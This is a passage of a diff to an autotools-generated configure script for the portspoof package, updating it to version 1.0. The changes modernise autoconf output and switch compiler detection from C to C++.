MKDIR_P within a source directory, because that will # break other packages using the cache if that directory is # removed, or if the value is a relative name. - test -d ./--version && rmdir ./--version MKDIR_P="$ac_install_sh -d" fi fi -{ echo "$as_me:$LINENO: result: $MKDIR_P" >&5 -echo "${ECHO_T}$MKDIR_P" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $MKDIR_P" >&5 +$as_echo "$MKDIR_P" >&6; } mkdir_p="$MKDIR_P" case $mkdir_p in @@ -1974,10 +2582,10 @@ for ac_prog in gawk mawk nawk awk do # Extract the first word of "$ac_prog", so it can be a program name with args. set dummy $ac_prog; ac_word=$2 -{ echo "$as_me:$LINENO: checking for $ac_word" >&5 -echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6; } -if test "${ac_cv_prog_AWK+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_AWK+set}" = set; then : + $as_echo_n "(cached) " >&6 else if test -n "$AWK"; then ac_cv_prog_AWK="$AWK" # Let the user override the test. @@ -1987,36 +2595,37 @@ for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. - for ac_exec_ext in '' $ac_executable_extensions; do + for ac_exec_ext in '' $ac_executable_extensions; do if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then ac_cv_prog_AWK="$ac_prog" - echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done -done + done IFS=$as_save_IFS fi fi AWK=$ac_cv_prog_AWK if test -n "$AWK"; then - { echo "$as_me:$LINENO: result: $AWK" >&5 -echo "${ECHO_T}$AWK" >&6; } + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $AWK" >&5 +$as_echo "$AWK" >&6; } else - { echo "$as_me:$LINENO: result: no" >&5 -echo "${ECHO_T}no" >&6; } + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } fi test -n "$AWK" && break done -{ echo "$as_me:$LINENO: checking whether ${MAKE-make} sets \$(MAKE)" >&5 -echo $ECHO_N "checking whether ${MAKE-make} sets \$(MAKE)... $ECHO_C" >&6; } -set x ${MAKE-make}; ac_make=`echo "$2" | sed 's/+/p/g; s/[^a-zA-Z0-9_]/_/g'` -if { as_var=ac_cv_prog_make_${ac_make}_set; eval "test \"\${$as_var+set}\" = set"; }; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether ${MAKE-make} sets \$(MAKE)" >&5 +$as_echo_n "checking whether ${MAKE-make} sets \$(MAKE)... " >&6; } +set x ${MAKE-make} +ac_make=`$as_echo "$2" | sed 's/+/p/g; s/[^a-zA-Z0-9_]/_/g'` +if { as_var=ac_cv_prog_make_${ac_make}_set; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 else cat >conftest.make <<\_ACEOF SHELL = /bin/sh @@ -2033,12 +2642,12 @@ esac rm -f conftest.make fi if eval test \$ac_cv_prog_make_${ac_make}_set = yes; then - { echo "$as_me:$LINENO: result: yes" >&5 -echo "${ECHO_T}yes" >&6; } + { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } SET_MAKE= else - { echo "$as_me:$LINENO: result: no" >&5 -echo "${ECHO_T}no" >&6; } + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } SET_MAKE="MAKE=${MAKE-make}" fi @@ -2057,9 +2666,7 @@ if test "`cd $srcdir && pwd`" != "`pwd`"; then am__isrc=' -I$(srcdir)' # test to see if srcdir already configured if test -f $srcdir/config.status; then - { { echo "$as_me:$LINENO: error: source directory already configured; run \"make distclean\" there first" >&5 -echo "$as_me: error: source directory already configured; run \"make distclean\" there first" >&2;} - { (exit 1); exit 1; }; } + as_fn_error "source directory already configured; run \"make distclean\" there first" "$LINENO" 5 fi fi @@ -2075,7 +2682,7 @@ fi # Define the identity of the package. PACKAGE=portspoof - VERSION=0.2 + VERSION=1.0 cat >>confdefs.h <<_ACEOF @@ -2103,112 +2710,6 @@ AUTOHEADER=${AUTOHEADER-"${am_missing_run}autoheader"} MAKEINFO=${MAKEINFO-"${am_missing_run}makeinfo"} -install_sh=${install_sh-"\$(SHELL) $am_aux_dir/install-sh"} - -# Installed binaries are usually stripped using `strip' when the user -# run `make install-strip'. However `strip' might not be the right -# tool to use in cross-compilation environments, therefore Automake -# will honor the `STRIP' environment variable to overrule this program. -if test "$cross_compiling" != no; then - if test -n "$ac_tool_prefix"; then - # Extract the first word of "${ac_tool_prefix}strip", so it can be a program name with args. -set dummy ${ac_tool_prefix}strip; ac_word=$2 -{ echo "$as_me:$LINENO: checking for $ac_word" >&5 -echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6; } -if test "${ac_cv_prog_STRIP+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - if test -n "$STRIP"; then - ac_cv_prog_STRIP="$STRIP" # Let the user override the test. -else -as_save_IFS=$IFS; IFS=$PATH_SEPARATOR -for as_dir in $PATH -do - IFS=$as_save_IFS - test -z "$as_dir" && as_dir=. - for ac_exec_ext in '' $ac_executable_extensions; do - if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then - ac_cv_prog_STRIP="${ac_tool_prefix}strip" - echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 - break 2 - fi -done -done -IFS=$as_save_IFS - -fi -fi -STRIP=$ac_cv_prog_STRIP -if test -n "$STRIP"; then - { echo "$as_me:$LINENO: result: $STRIP" >&5 -echo "${ECHO_T}$STRIP" >&6; } -else - { echo "$as_me:$LINENO: result: no" >&5 -echo "${ECHO_T}no" >&6; } -fi - - -fi -if test -z "$ac_cv_prog_STRIP"; then - ac_ct_STRIP=$STRIP - # Extract the first word of "strip", so it can be a program name with args. -set dummy strip; ac_word=$2 -{ echo "$as_me:$LINENO: checking for $ac_word" >&5 -echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6; } -if test "${ac_cv_prog_ac_ct_STRIP+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - if test -n "$ac_ct_STRIP"; then - ac_cv_prog_ac_ct_STRIP="$ac_ct_STRIP" # Let the user override the test. -else -as_save_IFS=$IFS; IFS=$PATH_SEPARATOR -for as_dir in $PATH -do - IFS=$as_save_IFS - test -z "$as_dir" && as_dir=. - for ac_exec_ext in '' $ac_executable_extensions; do - if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then - ac_cv_prog_ac_ct_STRIP="strip" - echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 - break 2 - fi -done -done -IFS=$as_save_IFS - -fi -fi -ac_ct_STRIP=$ac_cv_prog_ac_ct_STRIP -if test -n "$ac_ct_STRIP"; then - { echo "$as_me:$LINENO: result: $ac_ct_STRIP" >&5 -echo "${ECHO_T}$ac_ct_STRIP" >&6; } -else - { echo "$as_me:$LINENO: result: no" >&5 -echo "${ECHO_T}no" >&6; } -fi - - if test "x$ac_ct_STRIP" = x; then - STRIP=":" - else - case $cross_compiling:$ac_tool_warned in -yes:) -{ echo "$as_me:$LINENO: WARNING: In the future, Autoconf will not detect cross-tools -whose name does not start with the host triplet. If you think this -configuration is useful to you, please write to autoconf@gnu.org." >&5 -echo "$as_me: WARNING: In the future, Autoconf will not detect cross-tools -whose name does not start with the host triplet. If you think this -configuration is useful to you, please write to autoconf@gnu.org." >&2;} -ac_tool_warned=yes ;; -esac - STRIP=$ac_ct_STRIP - fi -else - STRIP="$ac_cv_prog_STRIP" -fi - -fi -INSTALL_STRIP_PROGRAM="\$(install_sh) -c -s" - # We need awk for the "check" target. The system "awk" is bad on # some platforms. # Always define AMTAR for backward compatibility. @@ -2225,44 +2726,34 @@ am__tar='${AMTAR} chof - "$$tardir"'; am__untar='${AMTAR} xf -' ac_config_headers="$ac_config_headers src/config.h" -cat >>confdefs.h <<\_ACEOF -#define _GNU_SOURCE 1 -_ACEOF +$as_echo "#define _GNU_SOURCE 1" >>confdefs.h UNAME=`uname` # Make sure we can run config.sub. $SHELL "$ac_aux_dir/config.sub" sun4 >/dev/null 2>&1 || - { { echo "$as_me:$LINENO: error: cannot run $SHELL $ac_aux_dir/config.sub" >&5 -echo "$as_me: error: cannot run $SHELL $ac_aux_dir/config.sub" >&2;} - { (exit 1); exit 1; }; } + as_fn_error "cannot run $SHELL $ac_aux_dir/config.sub" "$LINENO" 5 -{ echo "$as_me:$LINENO: checking build system type" >&5 -echo $ECHO_N "checking build system type... $ECHO_C" >&6; } -if test "${ac_cv_build+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking build system type" >&5 +$as_echo_n "checking build system type... " >&6; } +if test "${ac_cv_build+set}" = set; then : + $as_echo_n "(cached) " >&6 else ac_build_alias=$build_alias test "x$ac_build_alias" = x && ac_build_alias=`$SHELL "$ac_aux_dir/config.guess"` test "x$ac_build_alias" = x && - { { echo "$as_me:$LINENO: error: cannot guess build type; you must specify one" >&5 -echo "$as_me: error: cannot guess build type; you must specify one" >&2;} - { (exit 1); exit 1; }; } + as_fn_error "cannot guess build type; you must specify one" "$LINENO" 5 ac_cv_build=`$SHELL "$ac_aux_dir/config.sub" $ac_build_alias` || - { { echo "$as_me:$LINENO: error: $SHELL $ac_aux_dir/config.sub $ac_build_alias failed" >&5 -echo "$as_me: error: $SHELL $ac_aux_dir/config.sub $ac_build_alias failed" >&2;} - { (exit 1); exit 1; }; } + as_fn_error "$SHELL $ac_aux_dir/config.sub $ac_build_alias failed" "$LINENO" 5 fi -{ echo "$as_me:$LINENO: result: $ac_cv_build" >&5 -echo "${ECHO_T}$ac_cv_build" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_build" >&5 +$as_echo "$ac_cv_build" >&6; } case $ac_cv_build in *-*-*) ;; -*) { { echo "$as_me:$LINENO: error: invalid value of canonical build" >&5 -echo "$as_me: error: invalid value of canonical build" >&2;} - { (exit 1); exit 1; }; };; +*) as_fn_error "invalid value of canonical build" "$LINENO" 5;; esac build=$ac_cv_build ac_save_IFS=$IFS; IFS='-' @@ -2278,28 +2769,24 @@ IFS=$ac_save_IFS case $build_os in *\ *) build_os=`echo "$build_os" | sed 's/ /-/g'`;; esac -{ echo "$as_me:$LINENO: checking host system type" >&5 -echo $ECHO_N "checking host system type... $ECHO_C" >&6; } -if test "${ac_cv_host+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking host system type" >&5 +$as_echo_n "checking host system type... " >&6; } +if test "${ac_cv_host+set}" = set; then : + $as_echo_n "(cached) " >&6 else if test "x$host_alias" = x; then ac_cv_host=$ac_cv_build else ac_cv_host=`$SHELL "$ac_aux_dir/config.sub" $host_alias` || - { { echo "$as_me:$LINENO: error: $SHELL $ac_aux_dir/config.sub $host_alias failed" >&5 -echo "$as_me: error: $SHELL $ac_aux_dir/config.sub $host_alias failed" >&2;} - { (exit 1); exit 1; }; } + as_fn_error "$SHELL $ac_aux_dir/config.sub $host_alias failed" "$LINENO" 5 fi fi -{ echo "$as_me:$LINENO: result: $ac_cv_host" >&5 -echo "${ECHO_T}$ac_cv_host" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_host" >&5 +$as_echo "$ac_cv_host" >&6; } case $ac_cv_host in *-*-*) ;; -*) { { echo "$as_me:$LINENO: error: invalid value of canonical host" >&5 -echo "$as_me: error: invalid value of canonical host" >&2;} - { (exit 1); exit 1; }; };; +*) as_fn_error "invalid value of canonical host" "$LINENO" 5;; esac host=$ac_cv_host ac_save_IFS=$IFS; IFS='-' @@ -2326,372 +2813,146 @@ cat >>confdefs.h <<_ACEOF _ACEOF ;; -openbsd*) - -cat >>confdefs.h <<_ACEOF -#define SOMEBSD 1 -_ACEOF - - -cat >>confdefs.h <<_ACEOF -#define OPENBSD 1 -_ACEOF - -;; esac # Checks for programs. -ac_ext=c -ac_cpp='$CPP $CPPFLAGS' -ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' -ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' -ac_compiler_gnu=$ac_cv_c_compiler_gnu -if test -n "$ac_tool_prefix"; then - # Extract the first word of "${ac_tool_prefix}gcc", so it can be a program name with args. -set dummy ${ac_tool_prefix}gcc; ac_word=$2 -{ echo "$as_me:$LINENO: checking for $ac_word" >&5 -echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6; } -if test "${ac_cv_prog_CC+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - if test -n "$CC"; then - ac_cv_prog_CC="$CC" # Let the user override the test. -else -as_save_IFS=$IFS; IFS=$PATH_SEPARATOR -for as_dir in $PATH -do - IFS=$as_save_IFS - test -z "$as_dir" && as_dir=. - for ac_exec_ext in '' $ac_executable_extensions; do - if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then - ac_cv_prog_CC="${ac_tool_prefix}gcc" - echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 - break 2 - fi -done -done -IFS=$as_save_IFS - -fi -fi -CC=$ac_cv_prog_CC -if test -n "$CC"; then - { echo "$as_me:$LINENO: result: $CC" >&5 -echo "${ECHO_T}$CC" >&6; } -else - { echo "$as_me:$LINENO: result: no" >&5 -echo "${ECHO_T}no" >&6; } -fi - - -fi -if test -z "$ac_cv_prog_CC"; then - ac_ct_CC=$CC - # Extract the first word of "gcc", so it can be a program name with args. -set dummy gcc; ac_word=$2 -{ echo "$as_me:$LINENO: checking for $ac_word" >&5 -echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6; } -if test "${ac_cv_prog_ac_ct_CC+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - if test -n "$ac_ct_CC"; then - ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. -else -as_save_IFS=$IFS; IFS=$PATH_SEPARATOR -for as_dir in $PATH -do - IFS=$as_save_IFS - test -z "$as_dir" && as_dir=. - for ac_exec_ext in '' $ac_executable_extensions; do - if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then - ac_cv_prog_ac_ct_CC="gcc" - echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 - break 2 - fi -done -done -IFS=$as_save_IFS - -fi -fi -ac_ct_CC=$ac_cv_prog_ac_ct_CC -if test -n "$ac_ct_CC"; then - { echo "$as_me:$LINENO: result: $ac_ct_CC" >&5 -echo "${ECHO_T}$ac_ct_CC" >&6; } -else - { echo "$as_me:$LINENO: result: no" >&5 -echo "${ECHO_T}no" >&6; } -fi - - if test "x$ac_ct_CC" = x; then - CC="" +ac_ext=cpp +ac_cpp='$CXXCPP $CPPFLAGS' +ac_compile='$CXX -c $CXXFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CXX -o conftest$ac_exeext $CXXFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_cxx_compiler_gnu +if test -z "$CXX"; then + if test -n "$CCC"; then + CXX=$CCC else - case $cross_compiling:$ac_tool_warned in -yes:) -{ echo "$as_me:$LINENO: WARNING: In the future, Autoconf will not detect cross-tools -whose name does not start with the host triplet. If you think this -configuration is useful to you, please write to autoconf@gnu.org." >&5 -echo "$as_me: WARNING: In the future, Autoconf will not detect cross-tools -whose name does not start with the host triplet. If you think this -configuration is useful to you, please write to autoconf@gnu.org." >&2;} -ac_tool_warned=yes ;; -esac - CC=$ac_ct_CC - fi -else - CC="$ac_cv_prog_CC" -fi - -if test -z "$CC"; then - if test -n "$ac_tool_prefix"; then - # Extract the first word of "${ac_tool_prefix}cc", so it can be a program name with args. -set dummy ${ac_tool_prefix}cc; ac_word=$2 -{ echo "$as_me:$LINENO: checking for $ac_word" >&5 -echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6; } -if test "${ac_cv_prog_CC+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - if test -n "$CC"; then - ac_cv_prog_CC="$CC" # Let the user override the test. -else -as_save_IFS=$IFS; IFS=$PATH_SEPARATOR -for as_dir in $PATH -do - IFS=$as_save_IFS - test -z "$as_dir" && as_dir=. - for ac_exec_ext in '' $ac_executable_extensions; do - if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then - ac_cv_prog_CC="${ac_tool_prefix}cc" - echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 - break 2 - fi -done -done -IFS=$as_save_IFS - -fi -fi -CC=$ac_cv_prog_CC -if test -n "$CC"; then - { echo "$as_me:$LINENO: result: $CC" >&5 -echo "${ECHO_T}$CC" >&6; } -else - { echo "$as_me:$LINENO: result: no" >&5 -echo "${ECHO_T}no" >&6; } -fi - - - fi -fi -if test -z "$CC"; then - # Extract the first word of "cc", so it can be a program name with args. -set dummy cc; ac_word=$2 -{ echo "$as_me:$LINENO: checking for $ac_word" >&5 -echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6; } -if test "${ac_cv_prog_CC+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - if test -n "$CC"; then - ac_cv_prog_CC="$CC" # Let the user override the test. -else - ac_prog_rejected=no -as_save_IFS=$IFS; IFS=$PATH_SEPARATOR -for as_dir in $PATH -do - IFS=$as_save_IFS - test -z "$as_dir" && as_dir=. - for ac_exec_ext in '' $ac_executable_extensions; do - if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then - if test "$as_dir/$ac_word$ac_exec_ext" = "/usr/ucb/cc"; then - ac_prog_rejected=yes - continue - fi - ac_cv_prog_CC="cc" - echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 - break 2 - fi -done -done -IFS=$as_save_IFS - -if test $ac_prog_rejected = yes; then - # We found a bogon in the path, so make sure we never use it. - set dummy $ac_cv_prog_CC - shift - if test $# != 0; then - # We chose a different compiler from the bogus one. - # However, it has the same basename, so the bogon will be chosen - # first if we set CC to just the basename; use the full file name. - shift - ac_cv_prog_CC="$as_dir/$ac_word${1+' '}$@" - fi -fi -fi -fi -CC=$ac_cv_prog_CC -if test -n "$CC"; then - { echo "$as_me:$LINENO: result: $CC" >&5 -echo "${ECHO_T}$CC" >&6; } -else - { echo "$as_me:$LINENO: result: no" >&5 -echo "${ECHO_T}no" >&6; } -fi - - -fi -if test -z "$CC"; then - if test -n "$ac_tool_prefix"; then - for ac_prog in cl.exe + if test -n "$ac_tool_prefix"; then + for ac_prog in g++ c++ gpp aCC CC cxx cc++ cl.exe FCC KCC RCC xlC_r xlC do # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. set dummy $ac_tool_prefix$ac_prog; ac_word=$2 -{ echo "$as_me:$LINENO: checking for $ac_word" >&5 -echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6; } -if test "${ac_cv_prog_CC+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CXX+set}" = set; then : + $as_echo_n "(cached) " >&6 else - if test -n "$CC"; then - ac_cv_prog_CC="$CC" # Let the user override the test. + if test -n "$CXX"; then + ac_cv_prog_CXX="$CXX" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. - for ac_exec_ext in '' $ac_executable_extensions; do + for ac_exec_ext in '' $ac_executable_extensions; do if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then - ac_cv_prog_CC="$ac_tool_prefix$ac_prog" - echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + ac_cv_prog_CXX="$ac_tool_prefix$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done -done + done IFS=$as_save_IFS fi fi -CC=$ac_cv_prog_CC -if test -n "$CC"; then - { echo "$as_me:$LINENO: result: $CC" >&5 -echo "${ECHO_T}$CC" >&6; } +CXX=$ac_cv_prog_CXX +if test -n "$CXX"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CXX" >&5 +$as_echo "$CXX" >&6; } else - { echo "$as_me:$LINENO: result: no" >&5 -echo "${ECHO_T}no" >&6; } + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } fi - test -n "$CC" && break + test -n "$CXX" && break done fi -if test -z "$CC"; then - ac_ct_CC=$CC - for ac_prog in cl.exe +if test -z "$CXX"; then + ac_ct_CXX=$CXX + for ac_prog in g++ c++ gpp aCC CC cxx cc++ cl.exe FCC KCC RCC xlC_r xlC do # Extract the first word of "$ac_prog", so it can be a program name with args. set dummy $ac_prog; ac_word=$2 -{ echo "$as_me:$LINENO: checking for $ac_word" >&5 -echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6; } -if test "${ac_cv_prog_ac_ct_CC+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_ac_ct_CXX+set}" = set; then : + $as_echo_n "(cached) " >&6 else - if test -n "$ac_ct_CC"; then - ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. + if test -n "$ac_ct_CXX"; then + ac_cv_prog_ac_ct_CXX="$ac_ct_CXX" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. - for ac_exec_ext in '' $ac_executable_extensions; do + for ac_exec_ext in '' $ac_executable_extensions; do if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then - ac_cv_prog_ac_ct_CC="$ac_prog" - echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + ac_cv_prog_ac_ct_CXX="$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done -done + done IFS=$as_save_IFS fi fi -ac_ct_CC=$ac_cv_prog_ac_ct_CC -if test -n "$ac_ct_CC"; then - { echo "$as_me:$LINENO: result: $ac_ct_CC" >&5 -echo "${ECHO_T}$ac_ct_CC" >&6; } +ac_ct_CXX=$ac_cv_prog_ac_ct_CXX +if test -n "$ac_ct_CXX"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CXX" >&5 +$as_echo "$ac_ct_CXX" >&6; } else - { echo "$as_me:$LINENO: result: no" >&5 -echo "${ECHO_T}no" >&6; } + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } fi - test -n "$ac_ct_CC" && break + test -n "$ac_ct_CXX" && break done - if test "x$ac_ct_CC" = x; then - CC="" + if test "x$ac_ct_CXX" = x; then + CXX="g++" else case $cross_compiling:$ac_tool_warned in yes:) -{ echo "$as_me:$LINENO: WARNING: In the future, Autoconf will not detect cross-tools -whose name does not start with the host triplet. If you think this -configuration is useful to you, please write to autoconf@gnu.org." >&5 -echo "$as_me: WARNING: In the future, Autoconf will not detect cross-tools -whose name does not start with the host triplet. If you think this -configuration is useful to you, please write to autoconf@gnu.org." >&2;} +{ $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 +$as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac - CC=$ac_ct_CC + CXX=$ac_ct_CXX fi fi + fi fi - - -test -z "$CC" && { { echo "$as_me:$LINENO: error: no acceptable C compiler found in \$PATH -See \`config.log' for more details." >&5 -echo "$as_me: error: no acceptable C compiler found in \$PATH -See \`config.log' for more details." >&2;} - { (exit 1); exit 1; }; } - # Provide some information about the compiler. -echo "$as_me:$LINENO: checking for C compiler version" >&5 -ac_compiler=`set X $ac_compile; echo $2` -{ (ac_try="$ac_compiler --version >&5" +$as_echo "$as_me:${as_lineno-$LINENO}: checking for C++ compiler version" >&5 +set X $ac_compile +ac_compiler=$2 +for ac_option in --version -v -V -qversion; do + { { ac_try="$ac_compiler $ac_option >&5" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compiler --version >&5") 2>&5 +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compiler $ac_option >&5") 2>conftest.err ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } -{ (ac_try="$ac_compiler -v >&5" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compiler -v >&5") 2>&5 - ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } -{ (ac_try="$ac_compiler -V >&5" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compiler -V >&5") 2>&5 - ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } + if test -s conftest.err; then + sed '10a\ +... rest of stderr output deleted ... + 10q' conftest.err >conftest.er1 + cat conftest.er1 >&5 + fi + rm -f conftest.er1 conftest.err + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } +done -cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF +cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int @@ -2703,42 +2964,38 @@ main () } _ACEOF ac_clean_files_save=$ac_clean_files -ac_clean_files="$ac_clean_files a.out a.exe b.out" +ac_clean_files="$ac_clean_files a.out a.out.dSYM a.exe b.out" # Try to create an executable without -o first, disregard a.out. # It will help us diagnose broken compilers, and finding out an intuition # of exeext. -{ echo "$as_me:$LINENO: checking for C compiler default output file name" >&5 -echo $ECHO_N "checking for C compiler default output file name... $ECHO_C" >&6; } -ac_link_default=`echo "$ac_link" | sed 's/ -o *conftest[^ ]*//'` -# -# List of possible output files, starting from the most likely. -# The algorithm is not robust to junk in `.', hence go to wildcards (a.*) -# only as a last resort. b.out is created by i960 compilers. -ac_files='a_out.exe a.exe conftest.exe a.out conftest a.* conftest.* b.out' -# -# The IRIX 6 linker writes into existing files which may not be -# executable, retaining their permissions. Remove them first so a -# subsequent execution test works. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether the C++ compiler works" >&5 +$as_echo_n "checking whether the C++ compiler works... " >&6; } +ac_link_default=`$as_echo "$ac_link" | sed 's/ -o *conftest[^ ]*//'` + +# The possible output files: +ac_files="a.out conftest.exe conftest a.exe a_out.exe b.out conftest.*" + ac_rmfiles= for ac_file in $ac_files do case $ac_file in - *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.o | *.obj ) ;; + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; * ) ac_rmfiles="$ac_rmfiles $ac_file";; esac done rm -f $ac_rmfiles -if { (ac_try="$ac_link_default" +if { { ac_try="$ac_link_default" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 (eval "$ac_link_default") 2>&5 ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); }; then + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; then : # Autoconf-2.13 could set the ac_cv_exeext variable to `no'. # So ignore a value of `no', otherwise this would lead to `EXEEXT = no' # in a Makefile. We should not override ac_cv_exeext if it was cached, @@ -2748,14 +3005,14 @@ for ac_file in $ac_files '' do test -f "$ac_file" || continue case $ac_file in - *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.o | *.obj ) + 